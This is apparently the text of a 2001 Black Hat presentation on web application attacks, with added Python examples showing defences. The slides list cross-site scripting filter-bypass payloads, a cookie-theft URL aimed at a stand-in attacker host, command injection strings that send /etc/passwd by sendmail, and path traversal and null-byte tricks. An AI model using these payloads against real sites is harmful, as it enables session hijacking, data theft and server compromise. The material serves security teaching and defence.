Copyright 2001 WhiteHat Security All Rights Reserved
Topics
But Why!?
• Easiest way to compromise hosts, networks and users.
• Widely deployed.
• No Logs! (POST Request payload)
• Incredibly hard to defend against or detect.
• Most don’t think of locking down web applications.
• Intrusion Detection is a joke.
• Firewall? What firewall? I don’t see no any firewall.
• Encrypted transport layer does nothing.
• Best of all, no one is looking anyway.
How much easier can it get!?
Oh right.
Unicode
Web Application
The Simple Definition
Web Security Layers
The Implementation
E-Commerce: Shopping, Auctions, Banking, Stock Trading
Entertainment: Message Boards, WebMail, Guest Books, Voting Polls
Firewall
Common Web Application Security Mistakes
Trusting Client-Side Data
Trusting Client-Side Data
Numbers
<input type=hidden value=2149.37>
2149.00
Now On Sale!
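An added example, not from the WhiteHat slides, of the hidden-field mistake above and its fix in Python: the first checkout believes the hidden price field, the second prices the order from a server-side catalog and treats a differing client value as a tampering signal. The catalog, the item id and the tampered form body are constructed for this example.

```python
# Added example (not from the original slides): server-side pricing instead of
# trusting a hidden form field. Catalog contents and item ids are constructed.
from decimal import Decimal, InvalidOperation
from urllib.parse import parse_qs

# Server-side source of truth: item id -> unit price (constructed).
CATALOG = {"laptop-2001": Decimal("2149.37")}


def parse_form(body: str) -> dict:
    """Parse an application/x-www-form-urlencoded POST body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def checkout_trusting_client(form: dict) -> Decimal:
    """The mistake on the slide: whatever 'price' the browser sent is charged."""
    return Decimal(form["price"]) * int(form["qty"])


def checkout_server_authoritative(form: dict) -> Decimal:
    """Price is looked up server-side; the submitted 'price' is never used for
    arithmetic, only compared so that tampering can be logged."""
    item = form.get("item")
    if item not in CATALOG:
        raise ValueError("unknown item")
    qty = int(form.get("qty", "0"))
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    price = CATALOG[item]
    submitted = form.get("price")
    if submitted is not None:
        try:
            mismatch = Decimal(submitted) != price
        except InvalidOperation:
            mismatch = True
        if mismatch:
            # Worth an alert: a browser does not change hidden fields on its own.
            print(f"tampering suspected: client sent price={submitted}, catalog has {price}")
    return price * qty


# Constructed tampered POST: the hidden field was edited from 2149.37 down to 1.00.
TAMPERED_BODY = "item=laptop-2001&price=1.00&qty=1"

if __name__ == "__main__":
    form = parse_form(TAMPERED_BODY)
    print("trusting client :", checkout_trusting_client(form))      # 1.00
    print("server catalog  :", checkout_server_authoritative(form))  # 2149.37
```

The hidden field can stay in the form for the browser's benefit, but the only value that reaches the arithmetic is the catalog's; the client's copy is useful solely as an indicator for logging.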
Trusting Client-Side Data
Path
http://foo.com/cgi?val=string&file=/html/name.db
Or better yet…
http://www.foo.com/cgi?string=root&file=../../../../../etc/passwd
Unescaped Special Characters
Check for:
Unescaped special characters within input strings
HTML Character Filtering
Proper handling of special characters
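An added example, not from the WhiteHat slides, of what "proper handling" means in practice: encode user data on output, in the context it is written into, so the browser displays it instead of parsing it. The guest-book entries are constructed; the tag in the second one is the raw <SCRIPT> test string the slides use later.

```python
# Added example (not from the original slides): encode on output so that user
# data is displayed, never parsed as markup. Guest-book entries are constructed.
import html

ENTRIES = [
    ("alice", "Nice site!"),
    ("mallory", "<SCRIPT>alert('JavaScript Executed');</SCRIPT>"),
]


def render_entry(name: str, message: str) -> str:
    """Element-content context: &, <, > (and quotes) become entities, so the
    browser shows the tag text instead of executing it."""
    return "<li><b>%s</b>: %s</li>" % (
        html.escape(name, quote=True),
        html.escape(message, quote=True),
    )


def render_search_box(query: str) -> str:
    """Attribute-value context: the quotes matter most, because a raw '"'
    would end the value and let '><SCRIPT>' start a new element."""
    return '<input type="text" name="q" value="%s">' % html.escape(query, quote=True)


def render_guest_book(entries) -> str:
    """Whole page fragment; every user-supplied string passes through render_entry."""
    return "<ul>\n" + "\n".join(render_entry(n, m) for n, m in entries) + "\n</ul>"


def tag_survives(raw: str) -> bool:
    """True if a submitted tag string reaches the output unchanged. This is the
    'submit raw tags, look at the output' check turned into an automated test
    the application's own test suite can run against its templates."""
    return raw.lower() in render_entry("probe", raw).lower()


if __name__ == "__main__":
    print(render_guest_book(ENTRIES))
    print(render_search_box('"><SCRIPT>alert(1);</SCRIPT>'))
```

Encoding differs from filtering: nothing is deleted, so a message that legitimately contains "<" still reads correctly, and there is no blocklist for an obfuscated tag to slip past.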
More mistakes…
Information & Discovery
Spidering/Site Crawling
Identifiable Characteristics
Errors and Response Codes
File/Application Enumeration
Network Reconnaissance
Spidering/Site Crawling
Tools: WGET
http://www.gnu.org/software/wget/wget.html
Identifiable Characteristics
Comment Lines
URL Extensions
Meta Tags
Cookies
Client-Side scripting languages
Error and Response Codes
Error Messages
Exception Messages (Java / SQL)
404 Error Pages
Failed Login
Locked Account
Database or file non-existent
File/Application Enumeration
Sample Files
Template Directories
Temp or Backup files
Hidden Files
Vulnerable CGIs
Network Reconnaissance
WHOIS
ARIN
http://www.arin.net/whois/index.html
Port Scan (Nmap)
http://www.insecure.org/nmap/index.html
Traceroute
Ping Scan (Nmap or HPING)
http://www.hping.org/
NSLookup/ Reverse DNS
DNS Zone Transfer (DIG)
OS Finger Printing (Nmap or Xprobe)
Input Manipulation
Parameter Tampering
"Twiddling Bits."
Cross-Site Scripting
Filter-Bypass Manipulation
OS Commands
Meta Characters
Path/Directory Traversal
Hidden Form Field Manipulation
HTTP Headers
Cross-Site Scripting
Bad name given to a dangerous security issue
Client-Side Scripting Languages
Accessing the DOM & Outside the DOM
Authentication/Authorization
“Hand in the cookie jar.”
www.attacker.com/cgi-bin/cookie_thieft.pl?COOKIEDATA
The Scenarios
CSS Danger
“The Remote Launch Pad.”
Dangerous Attributes
“Attributes Bad”
STYLE
SRC
HREF
TYPE
Filter Bypassing
"JavaScript is a Cockroach"
Submit all the raw HTML tags you can find, and then view the output results.
Exploit:
<SCRIPT>alert('JavaScript Executed');</SCRIPT>
SRCing JavaScript Protocol
Description: The JavaScript protocol will execute the expression entered after the colon. Netscape Tested.
Further Information:
Any HTML tag with a SRC attribute will execute this script on page load or on link activation.
Exploit:
<IMG SRC="javasc	ript:alert('JavaScript Executed');">
Replacement of entities \10 - \11 - \12 - \13 will also succeed.
Hex instead of Decimal HTML entities will also bypass input filters and execute.
Solution: Filter these entities within the string, then do your further pattern matching.
AND CURLY
Description:
Obscure Netscape JavaScript execution line. Exact syntax is needed to execute.
Exploit:
<IMG SRC="&{alert('JavaScript Executed')};">
Solution:
<IMG SRC="XXalert('JavaScript Executed')};">
or something similar will nullify the problem.
Style Tag Conversion
Description: Turn a style tag into a JavaScript expression.
Exploit:
<style TYPE="text/javascript">JS EXPRESSION</style>
Solution: Replace the "javascript" string with "java_script" and all should be fine.
Solution: Again, filter and replace the "@import" and the "javascript:" just to be safe.
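An added example, not from the WhiteHat slides, covering the three preceding slides (the SRC JavaScript protocol, the &{...}; form, and the style TYPE trick): the value of a SRC, HREF or TYPE attribute is first normalised the way the browser effectively saw it (entities decoded, the ignored control characters removed), and only then checked, and the check is an allowlist of what may load rather than a search for the string "javascript". The obfuscated strings are the slide's own test inputs; they are only classified here, never emitted into a page. The allowed scheme set is an assumption for the example.

```python
# Added example (not from the original slides): normalise an attribute value
# before matching, then allowlist the schemes that may be loaded.
import html
import re
from urllib.parse import urlsplit

# Control characters a browser of the day ignored inside a scheme name:
# NUL, tab, LF, VT, FF, CR (decimal 0 and 9-13, the entities the slide refers to).
_IGNORED = re.compile(r"[\x00\x09-\x0d]")
# Assumed policy: only plain web URLs. "" is a relative URL such as logo.gif
# (note that protocol-relative //host URLs also have an empty scheme).
ALLOWED_SCHEMES = {"", "http", "https"}


def normalize_attr(value: str) -> str:
    """Decode decimal, hex and named entities once, drop the ignored control
    characters, trim surrounding whitespace. Pattern matching happens on this
    form, not on the raw string (the slide's 'filter these entities first')."""
    return _IGNORED.sub("", html.unescape(value)).strip()


def src_is_safe(value: str) -> bool:
    """Allowlist rather than blocklist: only http, https and relative URLs pass.
    javascript:, vbscript:, data: and the Netscape &{...}; form all fail."""
    norm = normalize_attr(value)
    if norm.startswith("&{"):
        return False  # &{expr}; entity syntax is not a URL at all
    try:
        scheme = urlsplit(norm).scheme
    except ValueError:  # malformed netloc, e.g. an unbalanced '['
        return False
    return scheme.lower() in ALLOWED_SCHEMES


def style_type_is_safe(value: str) -> bool:
    """<style TYPE=...>: the only acceptable type is text/css."""
    return normalize_attr(value).lower() == "text/css"


if __name__ == "__main__":
    for v in ["javasc\tript:alert('JavaScript Executed');",
              "&#106;avascript:alert(1)", "&{alert('JavaScript Executed')};",
              "http://www.foo.com/logo.gif", "logo.gif"]:
        print(src_is_safe(v), repr(v))
```

The order matters: decoding after matching is exactly the gap the hex-entity and tab variants exploit, and an allowlist of schemes makes the case-variant and "java_script"-style rewrites unnecessary because nothing that is not http, https or relative is ever accepted.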
Using CSS
Click to Execute
User must click on a link to execute the script.
(Search Fields, 404 Errors, etc.)
http://www.foo.com/NOFILE/<SCRIPT>alert('JavaScript Launched');</SCRIPT>
Mass Injection
All users viewing the page execute the script.
(Guest Books, Message Boards)
Message <SCRIPT>alert('JavaScript Launched');</SCRIPT>
Using CSS
Directed Injection
As soon as the user loads the page, the script executes.
(WebMail, HTML Mail, Messaging)
<LAYER SRC="javascript.js"></LAYER>
Twiddling Bits
OS Commands
Meta Characters
Path/Directory Traversal
Power of the Semi-Colon
Piping input to the command line.
OS Commands
http://foo.com/app.cgi?email=none@foo.com
Append:
http://foo.com/app.cgi?email=none@foo.com;+sendmail+/etc/passwd
Piping:
http://foo.com/app.cgi?email=none@foo.com+|+less
Re-Direct:
http://foo.com/app.cgi?email=none@foo.com+>+/
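An added example, not from the WhiteHat slides, of the mailing CGI above written so that the semicolon, pipe and redirect have nothing to act on: the email parameter is validated against a strict allowlist and the command is built as an argument list that no shell parses. The parameter name, the sendmail path and the exact validation rule are assumptions for this example; the three slide URLs appear only as constructed inputs that the code must reject.

```python
# Added example (not from the original slides): no shell ever sees the email
# parameter. Parameter name, sendmail path and validation rule are assumed.
import re
from urllib.parse import parse_qs, urlsplit

# Strict shape for the one value we need. The first character must be
# alphanumeric so the value can never be read as an option ("-o..."), and
# ; | > < ` $ & * and whitespace are simply not in the character set.
_EMAIL = re.compile(
    r"[A-Za-z0-9][A-Za-z0-9._%+-]{0,63}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}"
)


def email_from_url(url: str) -> str:
    """Take exactly one 'email' value from the query string ('+' decodes to a space)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True, separator="&")
    values = params.get("email", [])
    if len(values) != 1:
        raise ValueError("expected exactly one email parameter")
    return values[0]


def validate_email(value: str) -> str:
    """Allowlist check; anything outside the pattern is refused, not cleaned."""
    if not _EMAIL.fullmatch(value):
        raise ValueError("email not in allowed form")
    return value


def sendmail_argv(email: str) -> list:
    """Build the command as an argv list. subprocess.run(argv) without shell=True
    passes each element as one argument, so metacharacters carry no meaning."""
    return ["/usr/sbin/sendmail", "-oi", validate_email(email)]


def request_is_rejected(url: str) -> bool:
    """True when the request would never reach the command at all."""
    try:
        sendmail_argv(email_from_url(url))
        return False
    except ValueError:
        return True


# The slide's three variants, used here only as constructed rejection tests.
ATTACK_URLS = [
    "http://foo.com/app.cgi?email=none@foo.com;+sendmail+/etc/passwd",
    "http://foo.com/app.cgi?email=none@foo.com+|+less",
    "http://foo.com/app.cgi?email=none@foo.com+>+/",
]

if __name__ == "__main__":
    print(sendmail_argv(email_from_url("http://foo.com/app.cgi?email=none@foo.com")))
    for u in ATTACK_URLS:
        print(request_is_rejected(u), u)
```

Two layers are deliberate: the argv list removes the shell, and the allowlist removes argument injection into the program itself (a value starting with "-" would otherwise be an option to sendmail). Escaping the metacharacters instead would have to be complete for every shell and every program, which is why the slide's "filter" approach keeps failing.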
Power of Special Characters
Piping input to the command line.
Meta Characters
http://foo.com/app.cgi?list=file.txt
Altered:
http://foo.com/app.cgi?list=*
Power of the Dots and Slashes
Piping input to the command line.
DotDot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/passwd
Dot Slash:
http://foo.com/app.cgi?dir=path/to/data../../../../etc/././passwd
URL Encode
http://www.foo.com/cgi?value=%46%72%68%86
Null Characters
http://www.foo.com/cgi?value=file%00.html
More…
Alternate Case, Unicode, String Length, Multi-Slash, etc.
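An added example, not from the WhiteHat slides, that serves both the "Trusting Client-Side Data: Path" slide earlier and the dots-and-slashes, URL-encode, null-character and meta-character variants listed above: a file parameter is decoded once, refused if it carries a NUL, matched against an allowlisted shape (which excludes "..", "./", "*" and alternate encodings in one rule), and finally canonicalised and proven to lie under the document root. BASE_DIR and the allowed extensions are assumptions; the slide's strings appear only as constructed inputs the resolver must reject.

```python
# Added example (not from the original slides): a 'file'/'dir' parameter handled
# so that dot-dot, encoded, NUL-terminated and wildcard variants are all refused.
# BASE_DIR and the allowed extensions are assumptions for this example.
import os
import re
from urllib.parse import unquote

BASE_DIR = "/var/www/data"
# Letters, digits, '_' '-' and '/' for sub-directories, ending in an allowed
# extension. No '.' outside the extension, so "..", "./" and "name.db" cannot
# match; no '*' '?' '[' (shell globs); no '%' (would imply a second decoding
# pass); nothing above ASCII, which also ends the Unicode/alternate-case games.
_ALLOWED = re.compile(r"[A-Za-z0-9_/-]+\.(txt|html)")


def resolve_user_path(user_value: str, base_dir: str = BASE_DIR) -> str:
    # 1. Percent-decode exactly once. If the web framework already decoded the
    #    query string, skip this step: decoding twice re-opens %252e%252e tricks.
    decoded = unquote(user_value)
    # 2. NUL ends a C string, so "file%00.html" would open "file" while passing
    #    an ".html" suffix check written in a scripting language. Refuse it.
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    # 3. Allowlist the shape of the name.
    if not _ALLOWED.fullmatch(decoded):
        raise ValueError("path not in allowed form")
    # 4. Canonicalise and prove the result is still inside base_dir. Even with
    #    the allowlist this matters: "/etc/passwd.txt" is a legal shape but
    #    absolute, and os.path.join discards base_dir for absolute paths.
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, full]) != base:
        raise ValueError("path escapes base directory")
    return full


def path_is_rejected(user_value: str) -> bool:
    """True when the value never reaches the filesystem."""
    try:
        resolve_user_path(user_value)
        return False
    except ValueError:
        return True


# The slide's variants, as constructed test inputs.
SLIDE_INPUTS = [
    "../../../../../etc/passwd",
    "path/to/data../../../../etc/passwd",
    "path/to/data../../../../etc/././passwd",
    "%46%72%68%86",
    "file%00.html",
    "*",
]

if __name__ == "__main__":
    for v in SLIDE_INPUTS:
        print("rejected" if path_is_rejected(v) else "accepted", repr(v))
    print(resolve_user_path("reports/q1.txt"))
```

Step 4 is what catches the cases an allowlist author forgets (absolute paths, symlinked directories); step 3 is what keeps the resolver from ever touching a surprising name in the first place. Both together cost a few lines, and neither relies on recognising every spelling of "../".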
More bits…
System Mis-Configurations
“patches, patches, and more patches…”
Vendor Patches
Default Accounts
Check:
Web Server permission by directory browsing
Software version from Discovery
Known default accounts in commercial
platforms
BugTraq
Anonymous FTP open on Web Server
Other Dirty Tricks
“Abuse can be far more time consuming, costly and dangerous”
Thank You
BlackHat and Attendees
Questions?
Jeremiah Grossman
jeremiah@whitehatsec.com
WhiteHat Security
All presentation updates will be available on
www.whitehatsec.com